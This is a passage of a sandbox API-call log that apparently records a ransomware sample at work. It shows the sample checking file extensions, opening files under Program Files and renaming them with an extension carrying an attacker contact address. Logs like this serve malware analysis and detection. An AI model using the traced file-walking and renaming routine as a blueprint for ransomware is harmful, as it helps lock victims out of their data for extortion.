hTemplateFile=0x0) returned 0x428 [0157.920] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x38bff14 | out: lpFileSize=0x38bff14*=48936) returned 1 [0157.920] CloseHandle (hObject=0x428) returned 1 [0157.920] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi")) returned 0x20 [0157.920] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.920] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0157.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0157.921] lstrlenW (lpString=".doc") returned 4 [0157.921] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0157.921] lstrlenW (lpString=".docx") returned 5 [0157.921] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0157.921] lstrlenW (lpString=".pdf") returned 4 [0157.921] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0157.921] lstrlenW (lpString=".xls") returned 4 [0157.921] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0157.921] lstrlenW (lpString=".xlsx") returned 5 [0157.921] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0157.921] lstrlenW (lpString=".ppt") returned 4 [0157.921] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0157.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0157.921] lstrlenW (lpString=".zip") returned 4 [0157.921] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0157.921] lstrlenW (lpString=".rar") returned 4 [0157.921] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0157.921] lstrlenW (lpString=".bz2") returned 4 [0157.921] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0157.921] lstrlenW (lpString=".7z") returned 3 [0157.921] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0157.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0157.921] lstrlenW (lpString=".dbf") returned 4 [0157.921] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0157.921] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0157.921] lstrlenW (lpString=".1cd") returned 4 [0157.921] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0157.922] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0157.922] lstrlenW (lpString=".jpg") returned 4 [0157.922] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0157.922] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0157.922] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0157.922] lstrlenW (lpString=".doc") returned 4 [0157.922] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0157.922] lstrlenW (lpString=".docx") returned 5 [0157.922] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0157.922] lstrlenW (lpString=".pdf") returned 4 [0157.922] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0157.922] lstrlenW (lpString=".xls") returned 4 [0157.922] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0157.922] lstrlenW (lpString=".xlsx") returned 5 [0157.922] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0157.922] lstrlenW (lpString=".ppt") returned 4 [0157.922] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0157.922] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0157.922] lstrlenW (lpString=".zip") returned 4 [0157.922] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0157.922] lstrlenW (lpString=".rar") returned 4 [0157.922] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0157.922] lstrlenW (lpString=".bz2") returned 4 [0157.922] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0157.922] lstrlenW (lpString=".7z") returned 3 [0157.922] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0157.922] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0157.922] lstrlenW (lpString=".dbf") returned 4 [0157.923] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0157.923] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0157.923] lstrlenW (lpString=".1cd") returned 4 [0157.923] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0157.923] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0157.923] lstrlenW (lpString=".jpg") returned 4 [0157.923] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0157.923] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0157.923] lstrlenW (lpString="boxed-join.avi") returned 14 [0157.923] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0157.924] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x38bff14 | out: lpFileSize=0x38bff14*=46622) returned 1 [0157.924] CloseHandle (hObject=0x428) returned 1 [0157.924] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi")) returned 0x20 [0157.924] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.924] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0157.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0157.925] lstrlenW (lpString=".doc") returned 4 [0157.925] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0157.925] lstrlenW (lpString=".docx") returned 5 [0157.925] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0157.925] lstrlenW (lpString=".pdf") returned 4 [0157.925] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0157.925] lstrlenW (lpString=".xls") returned 4 [0157.925] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0157.925] lstrlenW (lpString=".xlsx") returned 5 [0157.925] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0157.925] lstrlenW (lpString=".ppt") returned 4 [0157.925] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0157.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0157.925] lstrlenW (lpString=".zip") returned 4 [0157.925] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0157.925] lstrlenW (lpString=".rar") returned 4 [0157.925] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0157.925] lstrlenW (lpString=".bz2") returned 4 [0157.925] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0157.925] lstrlenW (lpString=".7z") returned 3 [0157.925] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0157.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0157.925] lstrlenW (lpString=".dbf") returned 4 [0157.925] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0157.925] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0157.926] lstrlenW (lpString=".1cd") returned 4 [0157.926] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0157.926] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0157.926] lstrlenW (lpString=".jpg") returned 4 [0157.926] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0157.926] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0157.926] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0157.926] lstrlenW (lpString=".doc") returned 4 [0157.926] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0157.926] lstrlenW (lpString=".docx") returned 5 [0157.926] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0157.926] lstrlenW (lpString=".pdf") returned 4 [0157.926] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0157.926] lstrlenW (lpString=".xls") returned 4 [0157.926] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0157.926] lstrlenW (lpString=".xlsx") returned 5 [0157.926] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0157.926] lstrlenW (lpString=".ppt") returned 4 [0157.926] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0157.926] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0157.926] lstrlenW (lpString=".zip") returned 4 [0157.926] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0157.926] lstrlenW (lpString=".rar") returned 4 [0157.926] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0157.926] lstrlenW (lpString=".bz2") returned 4 [0157.926] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0157.926] lstrlenW (lpString=".7z") returned 3 [0157.927] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0157.927] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0157.927] lstrlenW (lpString=".dbf") returned 4 [0157.927] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0157.927] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0157.927] lstrlenW (lpString=".1cd") returned 4 [0157.927] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0157.927] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 71 [0157.927] lstrlenW (lpString=".jpg") returned 4 [0157.927] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0157.927] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0157.927] lstrlenW (lpString="boxed-split.avi") returned 15 [0157.927] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0157.928] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x38bff14 | out: lpFileSize=0x38bff14*=84190) returned 1 [0157.928] CloseHandle (hObject=0x428) returned 1 [0157.928] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi")) returned 0x20 [0157.928] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.928] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0157.928] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0157.928] lstrlenW (lpString=".doc") returned 4 [0157.928] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0157.928] lstrlenW (lpString=".docx") returned 5 [0157.928] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0157.928] lstrlenW (lpString=".pdf") returned 4 [0157.928] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0157.928] lstrlenW (lpString=".xls") returned 4 [0157.928] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0157.928] lstrlenW (lpString=".xlsx") returned 5 [0157.929] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0157.929] lstrlenW (lpString=".ppt") returned 4 [0157.929] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0157.929] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0157.929] lstrlenW (lpString=".zip") returned 4 [0157.929] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0157.929] lstrlenW (lpString=".rar") returned 4 [0157.929] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0157.929] lstrlenW (lpString=".bz2") returned 4 [0157.929] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0157.929] lstrlenW (lpString=".7z") returned 3 [0157.929] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0157.929] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0157.929] lstrlenW (lpString=".dbf") returned 4 [0157.930] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0157.930] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0157.930] lstrlenW (lpString=".1cd") returned 4 [0157.930] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0157.930] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0157.930] lstrlenW (lpString=".jpg") returned 4 [0157.930] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0157.930] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0157.930] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0157.930] lstrlenW (lpString=".doc") returned 4 [0157.930] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0157.930] lstrlenW (lpString=".docx") returned 5 [0157.930] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0157.930] lstrlenW (lpString=".pdf") returned 4 [0157.930] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0157.930] lstrlenW (lpString=".xls") returned 4 [0157.930] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0157.930] lstrlenW (lpString=".xlsx") returned 5 [0157.930] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0157.930] lstrlenW (lpString=".ppt") returned 4 [0157.930] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0157.930] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0157.930] lstrlenW (lpString=".zip") returned 4 [0157.930] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0157.930] lstrlenW (lpString=".rar") returned 4 [0157.930] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0157.930] lstrlenW (lpString=".bz2") returned 4 [0157.930] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0157.931] lstrlenW (lpString=".7z") returned 3 [0157.931] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0157.931] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0157.931] lstrlenW (lpString=".dbf") returned 4 [0157.931] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0157.931] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0157.931] lstrlenW (lpString=".1cd") returned 4 [0157.931] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0157.931] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0157.931] lstrlenW (lpString=".jpg") returned 4 [0157.931] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0157.931] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0157.931] lstrlenW (lpString="correct.avi") returned 11 [0157.931] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0157.932] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x38bff14 | out: lpFileSize=0x38bff14*=180172) returned 1 [0157.932] CloseHandle (hObject=0x428) returned 1 [0157.932] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi")) returned 0x20 [0157.932] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.932] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.932] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0157.932] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0157.932] lstrlenW (lpString=".doc") returned 4 [0157.932] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0157.932] lstrlenW (lpString=".docx") returned 5 [0157.932] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0157.932] lstrlenW (lpString=".pdf") returned 4 [0157.932] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0157.932] lstrlenW (lpString=".xls") returned 4 [0157.933] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0157.933] lstrlenW (lpString=".xlsx") returned 5 [0157.933] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0157.933] lstrlenW (lpString=".ppt") returned 4 [0157.933] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0157.933] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0157.933] lstrlenW (lpString=".zip") returned 4 [0157.933] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0157.933] lstrlenW (lpString=".rar") returned 4 [0157.933] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0157.933] lstrlenW (lpString=".bz2") returned 4 [0157.933] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0157.933] lstrlenW (lpString=".7z") returned 3 [0157.933] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0157.933] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 68 [0157.940] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0158.182] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x4579fa8, Size=0x2000) returned 0x4579fa8 [0158.182] lstrcmpiW (lpString1=".dat", lpString2=".bat") returned 1 [0158.182] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0158.183] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0159.560] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.560] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.560] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105298.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105298.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.561] CloseHandle (hObject=0x490) returned 1 [0159.562] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.562] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105396.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.562] CloseHandle (hObject=0x490) returned 1 [0159.563] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.563] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105398.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.563] CloseHandle (hObject=0x490) returned 1 [0159.564] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.564] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.564] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105410.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.564] CloseHandle (hObject=0x490) returned 1 [0159.566] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.566] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.566] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105412.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.566] CloseHandle (hObject=0x490) returned 1 [0159.567] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.567] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105414.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) 